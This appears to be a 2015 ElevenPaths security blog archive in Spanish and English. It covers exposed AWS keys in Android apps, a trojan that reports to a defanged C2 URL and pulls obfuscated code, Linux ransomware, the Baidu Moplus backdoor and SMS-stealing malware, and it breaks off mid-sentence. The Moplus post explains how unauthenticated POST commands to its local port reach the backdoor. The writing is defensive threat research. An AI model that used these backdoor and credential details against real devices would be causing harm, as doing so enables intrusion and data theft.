Cada vez más frecuente el desarrollo de aplicaciones móviles que interactúan con servicios comunes en entornos de movilidad como Amazon Simple Storage Service (S3), Amazon Simple Notification Service (SNS), Amazon Simple Queue Service (SQS) o Amazon Mobile Analytics. Para interactuar con estos servicios, las apps necesitan comunicarse con ellos y autenticarse con algún tipo de credencial (habitualmente basado en tokens). Hemos identificado prácticas de programación inseguras en forma de gestión incorrecta de credenciales de acceso, que podrían permitir a un atacante modificar el comportamiento de las apps afectadas. Gestión de identidades en Amazon AWS Los desarrolladores de apps móviles necesitan sus propias claves de acceso para realizar llamadas programáticas a los servicios Amazon. Pueden usar el AWS Command Line Interface (AWS CLI) , los SDKs de AWS, o llamadas HTTP directas usando las APIs para servicios individuales de AWS. Esto último es lo más común en las comunicaciones de las apps. Desde la consola de administración de Amazon, se pueden crear, modificar, ver o rotar las claves de acceso, conocidas como access key y secret key. Estas claves de acceso son válidas para interactuar de forma programática con el contenido o servicios ofrecido por Amazon. Las apps que hagan uso de este contenido, deberán por tanto conocer las claves de acceso. Aunque existen métodos más adecuados, algunos programadores incrustan esta información en la propia app. Si el acceso es de solamente de lectura, esto puede resultar en una mala práctica de programación, pero no en un problema de seguridad necesariamente. Sin embargo, si los permisos están mal establecidos, existe la posibilidad de controlar el contenido. Si además las contraseñas son accesibles por cualquiera que analice la aplicación, un atacante podría modificar ese contenido que más tarde será usado por la app. Si no se toman las medidas necesarias a la hora de establecer los permisos de acceso de las API keys, cualquiera con acceso a las claves podría no solo tener acceso a la información, sino modificarla. Las claves de acceso pueden ser introducidas en una app a través de un archivo de credenciales que se encuentra dentro del APK, en texto claro. Así, resulta más fácil la gestión y mantenimiento de la app. Este fichero se genera a través del AWS CLI. Por defecto su nombre es AWSCredentials.properties, y su formato similar al que se adjunta bajo estas líneas: Ejemplo (falso) de credenciales Mediante el uso de Tacyt, la herramienta de ciberinteligiencia de apps móviles de ElevenPaths, se ha buscado cuántas apps en los diferentes markets monitorizados contienen un fichero de este tipo, realizándose una comprobación posterior de la naturaleza de las credenciales asociadas. Búsqueda en Tacyt de APKs con este tipo de ficheros Nuestra base de datos, compuesta por 4.5 millones de apps, hemos localizado 1.635 ficheros APK que contienen un archivo de este tipo en el momento de redacción del presente informe. Esas 1.635 corresponden a apps y además versiones diferentes de esa misma app (hashes) almacenadas en nuestra base de datos. Las apps únicas (independientemente de su versión, y atendiendo a nombre de paquete único) s on en realidad 478 apps diferentes repartidas en diferentes markets. Se ha realizado un pequeño estudio comprobando en qué situación se encuentran las credenciales encontradas y qué peligro representan. Análisis de los datos Tras el análisis de las apps que contenían ficheros que potencialmente podrían suponer un problema de seguridad, este es el resultado obtenido: De todas las apps estudiadas, 102 ya no se encuentran en el market oficial y han sido retiradas. Aunque hayan sido retiradas, siguen suponiendo un problema, puesto que las apps permanecen en los dispositivos instalados, además de que las credenciales no dejan de ser válidas por ello. Hemos encontrado 478 apps diferentes que contienen credenciales válidas. 408 de ellas en Google Play. Sin embargo, el número de claves de acceso diferentes encontrado en todos los markets no es excesivamente alto: 63. Esto quiere decir, que varias de esas 63 credenciales se encuentran repartidas entre las diferentes apps. En otras palabras: muchos desarrolladores supuestamente diferentes comparten cuentas de AWS válidas. En concreto, dos credenciales diferentes se comparten en 523 y 196 versiones diferentes de las apps. Solo hay 26 credenciales únicas que no son compartidas y que se encuentran en una única app. De los 63 encontrados, 37 access key siguen siendo operativas, lo que significa que permiten realizar el proceso de autenticación de forma correcta. Las access key válidas compartidas siguen la siguiente distribución. De entre las válidas, una se encuentra repartida en 523 versiones diferentes de diferentes apps. De ellos, hemos podido obtener los permisos (ACL) de 26 credenciales. 22 claves de acceso mantenían FULL CONTROL con esas credenciales. Esto significa que se podía leer, escribir e incluso modificar algún contenido alojado en Amazon. El resto, permitían la escritura, con lo que a efectos prácticos, también supone un problema de seguridad. Las credenciales encontradas en Google Play están repartidas entre 408 apps diferentes. A su vez, muchos desarrolladores aparentemente distintos comparten credenciales. Llama la atención una misma credencial presente en 74 developers diferentes, cada uno con sus respectivas apps. De los 74 desarrolladores en Google Play que comparten credencial, cabe destacar que la mayoría parecen ser empresas de publicación de revistas y medios de comunicación en general, algunos bastante conocidos. Esto hace pensar que las apps de estas empresas han sido desarrolladas por un mismo equipo, que ha reutilizado de alguna manera parte de los recursos, entre ellos, la infraestructura en la nube y con ella las credenciales de acceso. Este cruce de credenciales compartidas entre apps diferentes que cargan contenido alojado en un tercero, abre una ventana de ataque interesante, dependiendo de los permisos de las credenciales. Es necesario matizar que no todas las apps que contienen credenciales tienen por qué hacer uso de ellas. Puede suponer simplemente una mala práctica por disponer de los permisos adecuados, lo que implica que, aunque suponga una exposición de información sensible, en la práctica no abre ninguna brecha de seguridad ni posibilidad de ataque contra los usuarios de la app o los desarrolladores. El informe completo está colgado aquí: Estudio de sobreexposición de credenciales de Amazon en aplicaciones móviles from ElevenPaths
16 de noviembre de 2015
Research: On the overexposure of Amazon credentials in mobile apps
The development of mobile applications that interact with common services in mobility environments such as Amazon Simple Storage Service (S3), Amazon Simple Notification Service (SNS), Amazon Simple Queue Service (SQS) or Amazon Mobile Analytics is becoming more frequent. To interact with these services, apps need to communicate with them and authenticate with some kind of credential (usually based on tokens). We have identified unsafe programming practices in the form of poor management of login credentials, which could allow an attacker to modify the behavior of the affected apps. Identity management in Amazon AWS Mobile app developers need their own access keys to programmatically call Amazon Services. They can use the AWS Command Line Interface (AWS CLI) , AWS SDKs or direct HTTP calls using APIs for AWS individual services. The latter is more common in apps communications. From the Amazon Management Console, access keys, known as access keys and secret keys can be created, modified, viewed or rotated. These access keys are valid to programmatically interact with the contents or services offered by Amazon. Apps that use these contents must therefore know the access keys. Although there are more appropriate methods, some programmers embed this information in the app itself. If access is read-only, this can result in a bad programming practice, but not necessarily in a security problem. However, if permissions are poorly established, contents could be controlled. If, in addition, access keys are accessible by anyone analyzing the application, an attacker could modify those contents that later on would be used by the app. If necessary measures are not taken when setting access permissions of the API keys, anyone with access to the keys could not only access the information, but modify it. However, access keys can also be introduced into an app through a credentials file located within the APK, in clear text. This way, apps are easier to manage and maintain. This file is generated with the AWS CLI. Its default name is AWSCredentials.properties, and its format is similar to the following: (Falso) example of credentials With Tacyt , ElevenPaths’ Cyber intelligence Tool for mobile apps, we have searched how many apps in the different monitored markets contain a file of such type, subsequently verifying the nature of the associated credentials. First seach in Tacyt for APKs with this kind of files At the time of writing this report, we found 1,635 APK files containing a file of this type in our database, formed by 4.5 million apps. Those 1,635 files correspond to apps and also to different versions of those same apps (hashes) stored in our database. Unique apps (regardless of their version, and on the basis of unique package name) are actually 478 different apps distributed over different markets. We have studied the situation of credentials and if they represent any risk. Data analysis These are the results obtained after analyzing the apps containing files that could potentially pose a security problem: Of all studied apps, 102 are no longer in the official market and have been removed. Although removed, they still to pose a problem, since the apps remain in the installed devices, and furthermore, credentials do not stop being valid even so. We have found 478 different apps containing valid credentials. 408 of them in Google Play. However, the number of different access keys found in all markets is not too high: 63. This means that several of those 63 credentials are distributed between different apps. In other words, many seemingly different developers share valid AWS accounts. In particular, two different credentials are shared in 523 and 196 different versions of the apps. There are only 26 unique credentials that are not shared and that are found in a sole app. 37 of the 63 access keys found remain fully operational, which means they allow the correct performance of the authentication process. The valid access keys shared have the following distribution. Among the valid access keys, one is distributed in 523 different versions of different apps. Of these access keys, we have obtained permissions (ACL) from 26 credentials. 22 access keys kept FULL CONTROL with those credentials. This means that some contents hosted on Amazon could be read, written and even edited.The rest of them allowed Write, which for practical purposes also poses a security problem. The credentials found on Google Play are distributed over 408 different apps. In turn, many seemingly different developers share credentials. It is interesting to see how there is a single credential present in 74 different developers, each one with their respective apps. Of the 74 credential-sharing developers on Google Play, it should be noted that most of them seem to be magazine publishing companies and media in general, some of them quite known. This suggests that these companies’ apps have been developed by the same team, which has somehow reused part of the resources, including the infrastructure in the cloud and, with it, the access credentials. This exchange of shared credentials between different apps that load contents hosted on a third party opens an interesting attack window, depending on the credentials permissions. It is necessary to clarify that not all apps containing credentials have to use them. It can simply constitute a "bad practice" if using the appropriate permissions, which means that, even if it involves exposure of sensitive information, in practice it does not open any security breach or attack possibility against app users or developers. The whole report is available here: Research on the overexposure of Amazon credentials in mobile apps from ElevenPaths
16 de noviembre de 2015
El troyano preinstalado en tablets baratas de Amazon también está en Google Play
Investigadores de Cheetah Mobile han encontrado troyanos preinstaldos en algunas tablets baratas de Amazon, muy difíciles de eliminar. Aquí, en ElevenPaths, hemos encontrado una versión de este troyano presente ahora mismo en Google Play y escondida bajo una aplicación de juegos HTML5. Este malware ha sido bautizado como " Cloudsota". La app, todavía en Google Play, realizada por la misma banda que "Cloudsota" El troyano encontrado por Cheetah Mobile, se encuentra preinstalado en las tablets, es capaz de instalarse de nuevo después de un reinicio si se ha borrado, secuestra la página de inicio del navegador y descarga apps de servidores para instalarlas silenciosamente si el dispositivo está rooteado (algo con bastante posibilidades en las tabletas donde viene preinstalado) Hemos encontrado un comportamiento muy similar en una app de Google Play, que descarga otros APK desde los mismos servidores, y cuyo código se asemeja bastante. De lo que estamos seguros, por varios indicios, es que está creado por la misma banda que Cloudsota, aunque quizás con más "cuidado" para poder entrar en el market oficial. Cómo funciona Una vez analizamos las apps encontradas por Cheetah, gracias a Tacyt, encontramos una fuerte correlación con solo una de las 4.6 millones de aplicaciones que tenemos en la base de datos. Esta app ha estado en Google Play desde agosto de 2015. Cuando se inicia o detecta la presencia de un usuario (desbloquea la pantalla), llama a un método "b" dentro de la clase com.android.ThreeTyCon.c que visita el sitio hxxp://union.dengandroid.com/getconfig y envía información interesante. JSon enviado al servidor antes de ser codificado Después de enviar esta información personal codificada (email, MAC, si el dispositivo está rooteado o no, etc) finalmente descarga (también codifica la petición HTTP) un fichero DEX llamado business.dex. Suponemos que este fichero puede ser diferente dependiendo de la información enviada previamente. El código para descargar y usar business.dex Este business.dex se encuentra bastante ofuscado, y contiene buena parte del código y la lógica maliciosa. Business.dex está también programado para descargar diferentes versiones de business_X.dex (la X depende de la configuración del dispositivo) que suponemos que hace al comportamiento global bastante impredecible. Si la utilidad busybox se encuentra en el dispositivo, intenta cargar librerías, instalar y desinstalar apps... Esto se hace justo antes de que business.dex sea descargado, suponemos que para desinstalar un potencial antivirus que el usuario pudiera mantener instalado y eliminarlo antes de descargare el (todavía más) código malicioso que podría ser detectado con mayor probabilidad. Intentando desinstalar código Hasta donde sabemos, la aplicación por sí misma o business.dex no contiene código para instalarse de nuevo si se borra, o secuestrar la página de inicio, pero parece que podría, puesto que vemos varias referencias en el código. It may hijacks the homepage Además , comparte con las muestras obtenidas por Cheetah, el uso de una librería muy particular llamada libshellcmd.so. Utiliza libshellcmd.so, librería compartida con Cloudsota La app en Google Play (com.cz.gamenavigation) es ya detectada por varios antivirus. Pero muchos no la detectan por este comportamiento, sino porque contiene código perteneciente al uso del SDK Airpush. Airpush se considera potencialmente adware dañino desde hace mucho por los antivirus. Resulta interesante también que la app ha sido descargada entre 5.000 y 10.000 veces, pero solo se le ha dado tres votos. Demasiadas descargas para tan pocos votos... Esto nos hace pensar en alguna especie de "tirón artificial" con descargas no reales y llevadas a cabo de forma automática por el mismo equipo que ha desarrollado la aplicación, consiguiendo así mejorar su posición de búsqueda en el market. Sergio de los Santos ssantos@11paths.com @ssantosv Miguel Ángel García miguelangel.garcia@11paths.com @nodoraiz
13 de noviembre de 2015
III Meetup Sinfonier: Ciberterrorismo
No podíamos despedir el año sin tratar un tema tan interesante como es el terrorismo en la red. Pero, ¿realmente sabemos lo que significa? ¿cómo se mitiga? ¿Qué diferencias hay respecto del terrorismo que siempre hemos conocido? Trataremos de dar respuesta a estas y otras preguntas a lo largo de tres intervenciones de 20 minutos en el Tercer MeetUP de Sinfonier sobre Ciberterrorismo. Cuándo: 19 de noviembre Dónde: Telefónica Flagship Store - C/Gran Vía 28, Madrid Contaremos con profesionales de primer nivel que anunciaremos en los próximos días. Nos acompañarán representantes del principal Think Tank de ciberseguridad de nuestro país. Hasta aquí podemos leer. Ven al meet up de Sinfonier Y esto no es todo. No podíamos despedir el año sin un concurso. Por eso, si te atreves a desarrollar un módulo para Sinfonier, participa en el concurso Sinfonier Commnunity 2015 y desarrolla una tipología innovadora y de utilidad que tenga aplicación para entornos de Smart Cities, Economía Digital e Identidades Digitales. Si eres un desarrollador o analista de inteligencia, ¡haz lo que mejor sabes y cobra por ello! Participa y gana 3.000 USD. ¡Inscríbete ahora! Únete a nuestra Communidad
12 de noviembre de 2015
Ransomware para Linux… algunas aclaraciones y reflexiones
A estas alturas, ya se ha oído hablar bastante del nuevo " ransomware para Linux" que secuestra páginas web alojadas en servidores Linux, y pide un rescate (un bitcoin en este caso) por ellas. La información que se ha dado merece, cuando menos, algunas aclaraciones y una reflexión. Lo interesante es la filosofía Se ha dado por hecho que a las páginas web que utilicen el sistema de comercio electrónico Magento han sido las atacadas. Magento es una tienda en PHP, que (como muchísimos otros gestores en PHP) tuvo un problema de seguridad que permitía la ejecución de PHP arbitrario, lo que equivale casi (si el administrador no ha tomado las medidas adecuadas) a la ejecución de código, al menos con los permisos del servidor web. Una rápida búsqueda hace pensar que sí, existen muchos sitios con Magento afectados… pero también Joomlas, Wordpress, Imagevues… cualquier programa vulnerable en PHP. La razón es simple: la vulnerabilidad y la carga del malware (el payload) como es costumbre, son independientes. Lo "normal" es que los atacantes usen "dorks" de búsqueda de sitios PHP vulnerables y programan scripts para intentar aprovechar vulnerabilidades conocidas. Una vez que saben que pueden ejecutar PHP, el sitio es prácticamente suyo. Desde ahí, habitualmente, suben phishing, envían spam, realizan un "deface", alojan contenido ilegal… etc. Esto lo hace cualquier atacante de perfil bajo, "desde siempre". La novedad aquí por tanto no es que se ataque a Linux o PHP. Eso se hace todos los días. El foco de atención debería ponerse sobre la filosofía del ataque: en vez de aprovechar las capacidades del servidor, han preferido secuestrar su contenido. Igual ocurrió en Windows. En vez de infectar los sistemas con más adware, ralentizarlo, usarlo como bot, robar credenciales… los atacantes comprobaron en 2010 que secuestrarlo podía ser más rentable. Y de qué manera. Ya lo habían intentado tímidamente en ocasiones anteriores, pero fue ese año cuando se abrió una era. No cambió la forma en la que el malware llegaba al sistema, sino qué hacía una vez en él y cómo enfocaba su rentabilidad. De hecho, resultaba técnicamente más simple en muchos sentidos con respecto a lo que se venía haciendo hasta entonces. Por tanto, sobre Linux.Encoder.1, es interesante que esté programado para Linux, pero solo porque el atacante sabe que su cuota de éxito será mayor ahí. Bien podría poder haberlo hecho para cualquier plataforma, no supondría demasiado problema. Eso no es la novedad real. Aviso para el administrador, no para el visitante de la web (este fichero no queda visible por defecto para ser mostrado por el servidor) De hecho, vemos aquí algunos ejemplos de sitios afectados. Parece que varios de ellos, ya estaban previamente comprometidos y alojaban shells en PHP (síntoma de un compromiso de "perfil bajo"). Esto quiere decir que fueron víctimas de esos bots que buscan sitios aleatorios en PHP vulnerables previamente, y que ya estaban en manos de atacantes antes de que les este malware cifrara su web. Ejemplo de sitio cifrado, pero que ya alojaba una shell Un ejemplo cualquiera de página cifrada Sería interesante realizar un pequeño forense a esas máquinas para saber de dónde vino el ataque. Parece que no tenía capacidad de gusano (lanzar nuevos ataques desde la propia víctima), por tanto, podría dar una pista de los atacantes, si no se ocultaban a través de una red de anonimato. ¿Importa la detección? Por supuesto, el malware no era detectado por los sistemas antivirus tradicionales por firma. Pero no importa demasiado. No parece habitual que administradores de Windows, y muchos menos de Linux, pongan en producción un sistema operativo protegido en tiempo real por antivirus. Como mucho, lanzarán cada cierto tiempo un análisis estático. Además, no es la forma más correcta de defenderse. El malware entra en el servidor no porque no se defienda adecuadamente contra el malware, sino porque acepta comandos de cualquiera. En el mundo de los servidores, más que un antivirus, es todavía mucho más razonable invertir en parchear el sistema y mantenerlo a salvo de los fallos más obvios. O centrar los esfuerzos en impedir que un acceso por web acabe con el control del servidor y ejecute comandos peligrosos. Un cambio de filosofía El ransomware ya se probó en los primeros años de la década pasada, cuando el malware no estaba profesionalizado. Pequeños intentos aislados que no tuvieron mucho éxito. Pero el boom sufrido en los últimos tiempos, primero con los bloqueadores de sistema y ahora con el malware que cifra archivos, supuso un importante cambio de filosofía. Se podía ganar aún más dinero con el malware. Ya disponían de un buen montón de usuarios vulnerables, plataformas profesionalizadas y buena distribución… pero no todo era el malware bancario. También estaba la extorsión. Qué descubrimiento. Esto parece especialmente preocupante. Los atacantes también tienen un buen montón de servidores vulnerables repartidos por el mundo y los aprovechan. ¿Y si deciden que esta nueva aproximación es más rentable que los ataques a servidores web que se vienen realizando hasta ahora? ¿Podemos asistir a una nueva moda en la que los servidores y páginas sean cifradas en vez de "desfiguradas"? ¿En las que se pida un rescate en vez de instalar una shell en PHP o un mailer? Nunca se sabe. Aunque pueda existir un buen mercado, parece que el perfil de víctima no sería tan interesante (igual que no lo es el usuario de escritorio de sistemas operativos que no sean Windows). Además, la cura contra este problema es: Una copia de seguridad actualizada, que es algo más probable (en contraste con el usuario de escritorio o administrador de red) que hayan hecho los dueños… o los administradores del hosting (aquí la responsabilidad puede que se diluya entre el responsable del contenido de la página y los responsables de la plataforma en la que está alojada) Parchear el sistema contra vulnerabilidades conocidas. Si los administradores no lo han hecho, estamos seguros de que ya tienen otros problemas, puesto que es una puerta abierta al mundo que, seguro, ya es explotada habitualmente. Todo es cuestión de coste y beneficio, y quizás un servidor comprometido con posibilidades más "dinámicas" (alojamiento de phishing, warez, spam, etc.) y usable a largo plazo sea más rentable que cifrarlo. Usado de esta forma es un "valor seguro", mientras que la destrucción del propio servidor y reclamación de un rescate es un todo o nada, que puede salir bien (pagan) o no. Dicen que pagan el 3% de los casos de Windows. F-Secure afirma que estos atacantes han podido ganar 12.000 euros en un mes ( 11.934 específicamente). Estos cálculos son arriesgados. ¿En qué se basan? No se menciona. Si buscamos en Google páginas posiblemente afectadas y todavía accesibles o cacheadas, obtenemos algo más de 12.000 resultados (aunque podrían ser más, pues Google está olvidando rápidamente). De ellos, la mayoría parecen reales, pero muchos son dobles entradas en el buscador de un mismo dominio, por lo que no cuentan. Limpiando la salida con una búsqueda más afinada, podríamos hablar de (siendo generosos) 10.000 sitios afectados (curiosamente, muchísimo dominio europeo). El atacante pedía un solo bitcoin, que valora en 420 dólares (precio de primeros de noviembre). Si respetamos el precio, suponemos 10.000 afectados y hablamos de un 1% de víctimas que llegan a pagar, tenemos 100 afectados y 42.000 dólares. Para que salgan los cálculos de F-Secure, tendríamos que suponer que, no un 1%, sino aproximadamente un 0,30% de esos 10.000 sitios han pagado. ¿Es real este dato? Quién sabe. Frente al dato estimado para Windows ( el 3% de los infectados pagan), implica que los administradores de páginas son 100 veces menos propensos a pagar… Seguro que son menos propensos, pero no sabemos cuánto. De hecho, igual de irrelevante que la plataforma, aquí los números absolutos también lo son desde el punto de vista de qué nos depara el futuro. Importa la rentabilidad en términos relativos. Lo único que nos permitirá saber si es rentable o no será si asistimos a nuevos ataques. En esta versión han cometido errores de bulto, como por ejemplo una mala implementación que permite descifrar los archivos sin necesidad de pagar, basándose en la fecha del primer archivo infectado. Esto ya lo hicieron en los primeros tiempos los atacantes "tradicionales" de ransomware de escritorio. Pero afinaron. Si en el futuro se observan nuevos ataques con malware mejorado, es que el ratio de víctimas que han pagado, sea cual sea, merece la pena. Así de simple. Sergio de los Santos ssantos@11paths.com @ssantosv
11 de noviembre de 2015
Apps en Google Play que instalan un servidor HTTP como backdoor en tu Android
Trend Micro ha descubierto un problema muy intereasnte con un SDK llamado Moplus que, literalmente, funciona como un backdoor para dispositivos Android. Los problemas son que este SDK pertenece a Baidu (el buscador Chino más importante); que se usa no solo en sus apps sino en las de terceros; y que algunas de las apps afectadas están en estos momentos en Google Play, con millones de descargas. Encontrar dispositivos vulnerables es tan sencillo como escanear una red y enviar comandos HTTP. Además de la investigación de Trend Micro, hemos descubierto otras apps en Google Play y algunas curiosidades. El SDK se llama Moplus. Además de sus "funcionalidades oficiales", establece un servidor HTTP local (el conocido nanoHttpd), que escucha en diferentes puertos, depende de la app y la versión del SDK (probablemente el puerto 6259). Si nos conectamos a ese puerto, no se sirve ningún contenido (documentRoot apunta a data/data/apkNamefileslocal_http_server)… pero permite a un atacante enviar peticiones POST con comandos. Definiendo el puerto donde escuchará el servidor Y eso es todo. Cualquier atacante podría enviar comandos al puerto a través de peticiones HTTP POST sin autenticación. Una de las versiones más débiles que hemos visto es utilizar la cabecera "remote-addr" en 127.0.0.1 como método único de validación. Otros parece que necesitan que el referer case con esta expresión regular: ^http[s]?://[^/]+(.baidu.com|.hao123.com|.hiapk.com|.91.com)(:d+)?(/.*|)$"; Si funciona, ejecutará las órdenes y devolverá un JSON con la respuesta (siempre y cuando los permisos en la app lo permitan, cosa que la mayoría de las que hemos visto hacen). ¿Qué comandos soporta? Quedan muy claros observando esta pieza de código: Código con los comandos aceptados Permite la descarga de ficheros, y la subida de cualquier fichero también. Devuelve la lista de apps instalada, insertar un nuevo contacto... en dispositivos rooteados, incluso se permitiría la instalación de un apk diferente de forma silenciosa. Código para añadir contactos de forma remota Parte del código para subir ficheros Trend Micro contactó con Baidu, y este creó una nueva versión que elimina los comandos potencialmente peligrosos de la lista. También están reemplazando de los markets las apps afectadas. ¿Qué hemos encontrado? Trend Micro habla de miles de apps afectadas. Con Tacyt, encontramos varias usando el SDK y todavía disponibles en Google Play. Algunas con hasta 5 millones de descargas y no relacionadas con Baidu. Una variante del código con los comandos que se admiten Estos son algunos de los packageNames vistos en Google Play (aunque habrá más, seguro) y que complementan a los ya publicados por Trend Micro (hasta ahora): com.qiyi.video.market com.nd.android.launcher91 com.ivodani.comicsisland.activity com.qyer.android.jinnang com.pad.comicsisland.activity com.cubic.choosecar No hemos podido confirmar que los comandos remotos funcionen igual en todas ellas. Lo que es seguro es que contienen el código del backdoor, pero puede que necesiten algún cambio en la fórmula de comunicación para usar esta puerta trasera. Deberían ser revisadas individualmente para estar seguros (o incluso si es que funcionan). Una de las más sencillas de comprobar, es la popular Baidu Maps. No esta, sino su versión previa 8.7.0. En la imagen, usamos este plugin de Chrome para inyectar comandos POST. El resultado, (insertar un contacto de forma remota) se muestra también en la figura. Como se puede ver, el icono de Baidu Maps está en la barra de notificación del teléfono. Añadiendo contactos con un comando POST Merece la pena mencionar que, muchas de las apks avistadas con el código, confían en dos ficheros clases.dex diferentes. Esto significa que, una vez ejecutado, la app podría cargar classes2.dex (o cualquier nombre) desde su código "principal". Habitualmente es este segundo fichero .dex el que contiene el código del backdoor. Una app que contiene un segundo fichero "dex Esto no es nuevo. Mucho malware/adware in Google Play usa este truco para intentar eludir las detecciones. Puede que descarguen el .dex de otro sitio, o lo lleven dentro, pero resulta interesante comprobar que las capacidades de este SDK Moplus suelan encontrarse en este segundo fichero .dex. Además, uno de los puntos más interesantes es que Mobo Launcher, relacionado con el conocido market Mobogenie, contiene el código del backdoor también, y este sí es popular incluso fuera de China. Está en Google Play desde finales de 2014. De hecho, es la app más antigua en el market principal con esta versión del backdoor, hasta donde sabemos. Algunas de las apps detectadas en Tacyt Aunque no hemos podido hacerlo funcionar y enviarle un comando que no devuelva un error (todavía no estamos seguros de qué falla) el servidor nanoHttp se levanta, y el código para recibir comandos se encuentra presente en la app... por lo que hay razones más que suficientes para no fiarse de esta app. Un análisis más en profundidad podría permitir saber cómo funciona y, a un atacante, aprovechar el fallo. Por supuesto, existen otros APKs fuera de Google Play (aptoide, mobogenie...) con este backdoor también. La parte buena es que la mayoría de estos programas ya son detectados por varios motores, no solo por esta razón, pero detectados, en todo caso. Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanuel.tirado@11paths.com
5 de noviembre de 2015
Android malware not only posing as Word documents… but Excel as well
China is a paradise for "SMS stealing malware" for Android. These programs steal your SMS inbox, notebook… The only "problem" for malware creators is to induce users to install the app. They usually use supposed pornographic content as a decoy. Zscaler just found some malware of this kind posing as a word document. We have updated their research with some new malware for android posing as Excel documents and some other interesting stuff. Zscaler describes a more or less typical SMS infostealer Chinese malware. The improvement here is that they use a Word document icon for the Android malware. That would make the user believe that they are not installing anything, but trying to view a simple document. We searched and found some other malware (probably from the same attacker) posing as an Excel document, and got access to the email where the stolen info is sent to. Some interesting stuff The samples we have analyzed use an Excel icon. They are slightly different depending on the sample. App that tries to look like an Excel document, and another example of icon it may use In this samples, the attacker uses an approach different from the one described by Zscaler that seems to be a little bit more advanced. Malware sends SMS history and contact list to the attackers' email, but in this case, the password for sending the email (and to check it, too) is not directly in the code, but in a configuration file. Configuration file for the malware. Password and email included We got to get into the mailbox of these mails and confirmed that, indeed, there were real SMS and contacts there. In an account, we found lots of supposed IMSI numbers and the whole SMS collection of the victim. Stolen SMS from the victims Zscaler found the "word document" malware was stealing the IMEI, while this one, as can be seen in the image, is identifying the victim by its supposed IMSI. In another account from other sample, we find the contacts list of the victim (name and number). Some of the stolen contacts The malware is able to "silent" the phone as well. Setting the audio to silence As usual, the attacker is a "regular" Google Play developer. He has been uploading apps to Google Play for months, and there are some of them online. Some apps from the same developer Thanks to Tacyt, we can get to know the developer, more than a single app. Most of the apps by this developer are removed, but they are not like this kind of malware described above. SMS stealers would not be able to bypass Google checks. Most of them are clickers, riskware in general or very aggressive adware. One of the few that are still alive is this: One of the apps from the same developer still in Google Play. It is not a SMS stealer, but aggresive adware. Conclusion We got to expand and improve the Zscaler research. Same old tricks as used in PC are more and more used in Android again and again, like this "icon decoy" system. It is importan to highlight that this malware has nothing to do with Microsoft, Office, Word or Excel in Android, they just use their icons as something attractive to confuse users. Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanual.tirado@11paths.com
31 de octubre de 2015
About the relations between ngemobi/Xinynhe, Ghost Push, Kemoge and Odpa malicious Android adware
Over the last few weeks we have seen some blog entries about different new Android based mobile malicious adware families discovered or spotted by CM Security Research Lab, Checkpoint, FireEye and Trend Micro, that allows a complete takeover of an Android user’s device. These mobile malicious adware families have been named "NGE MOBI/Xinyinhe", "Brain Test", "Ghost Push" and "Kemoge", and are supposed to be developed by Chinese groups. We have tried to detect relationships between these different families. For example: What’s going on with these "new" malicious adware families? How "new" are they? Are these different malicious adware campaigns somehow connected? Who has developed this adware campaigns? In order to find the answer to these questions, the reported malicious adware families have been "squeezed" by Eleven Paths analyst researches using our in-house developed mobile cyber-intelligence Tacyt tool, to obtain more contextual information and the particular associated app "singularities" (technical or circumstantial app data that are "singular or unique" to a developer and/or application). The above mentioned different adware campaigns have been analyzed and correlated on the basis of various application parameters, and the evidences obtained suggest us that: The malicious adware family reported recently by FireEye (in September and October) seems to be related with the "Ghost Push" malware discovered by CM Security Research Lab and Trend Micro, as several clues regarding the links and associated certificate info included in the app point to the same developers, which in turn, seems to be related with the FireEye’s "Kemoge" called adware family as well. The "Brain Test" malware app reported by CheckPoint contacted a server domain included also on the "Kemoge" adware family sample. The aggressive adware discovered apps have had some versions in Google Play in early 2015, by a developer that produced aggressive adware as well. Taking into account the several obtained "singularities" and hints, it seems that this adware or malware may all come from a single root, probably the known Odpa or Opda (it depends on the antivirus engine) creators ( a known adware and infostealer) that may be the predecessor of these malicious adware families. Brief research schema Squeezing the Apps Here we expose a few details of a much deeper analysis that you may find complete in a link below. As shown in one of the FireEye reports the attackers have repackaged popular apps and inject ed malicious logic and ad components into the apps. The malicious adware iterates some domains and posts data once a connection is established. Searching with our Tacyt tool for the specific domains used by the malicious adware as indicated by the FireEye team, our analysts have found 12 different apps ( some from the report itself, some from "Kemoge" samples). One of them, with "com.android.camera.update" package name, to be related to another (and supposed different) described mobile attack dubbed "MonkeyTest" by Cheetah Mobile on September 18th, 2015. Searching for the com.android.camera.update app (from CM report), it reveals that this app uses a certificate singularity shared with one of the FireEye is reporting as downloaded by their samples. It shares the word "dashi" as well in the package name. There are even some specific strings in the code, which are shared between samples from all the reports. It seems that some of the apps related with the developers were uploaded to Google Play back in late December or January. Searching with Tacyt for some specific binary files inside the apk, it brought us to some apps on Google Play which have been removed last January from the market. Apps sharing very specific binary files A curious thing is that most of them share this application permission, which is not very common (32 out of 4.5M apps): android.permission.ACCESS_MTK_MMHW. Searching for certificates with those particular characteristics and for apps removed from Google Play the exact same day (which is supposed to be when Google discovered the fraud and cleaned the market), Tacyt obtained some evidence of related bands, like this particular UMENG ApiKey, as shown on the picture below: Shared UMENG Api Key This UMENG ApiKey has been shared with only a previous version of "Root Checker", removed from Google Play on 27th, December, 2014 and from "OPDA" developers that claim that their developer web is www.dashi.com, which in turn, is related to a previous package name used in NGE (Xiny) attack. And there are even more connections between the word "Dashi" and OPDA developer. OPDA developers may be behind Odpa/Opda adware famlily, found in summer 2014. On the other hand, CheckPoint reported that some of the domains found inside "Brain Test" malicious app seems to be present in "Kemoge" adware family as well: Sharing specific domains Conclusions Tacyt’s powerful engine enables the analyst teams of the organizations to easily evaluate and correlate the application and its circumstances: when, who, what and where. Using Tacyt our analyst team has been able to obtain further evidences that suggest a relationship between several reports, and confirm that some of aggressive apps discovered had a version in Google Play in early 2015. The evidences suggests that this supposed different families of malware, may be just the same Chinese band (because of the infrastructure, domains, topics, files, etc. they use) evolving the same idea about serving aggressive ads, rooting the devices, sending commands and installing new packages. We assume this because of the several hints that join the families: domains, dates, permissions, names, certificates, resources, etc. They started their activities maybe in late 2014, using the OPDA "brand", trying to introduce malware in Google Play and legitimate apps as well. Later, they have evolved with new techniques, from "Xinyinhe adware", that seems to be just a variant of "Ghost Push" to "Brain Test" which seems some experiment before they got to "Kemoge". It seems that this Chinese gang is evolving techniques and creating more effective adware that are not able to spread via Google Play anymore, but third party stores. Anyhow, it seems that they use Google Play to serve "less aggressive" adware. Disclaimer: This whole report has been done without code analysis and with the minimum information provided by the blog post mentioned above. Taking into account more samples, relations between all the samples are even stronger. A further analysis of all the data collected (emails, links, strings, etc) from all the 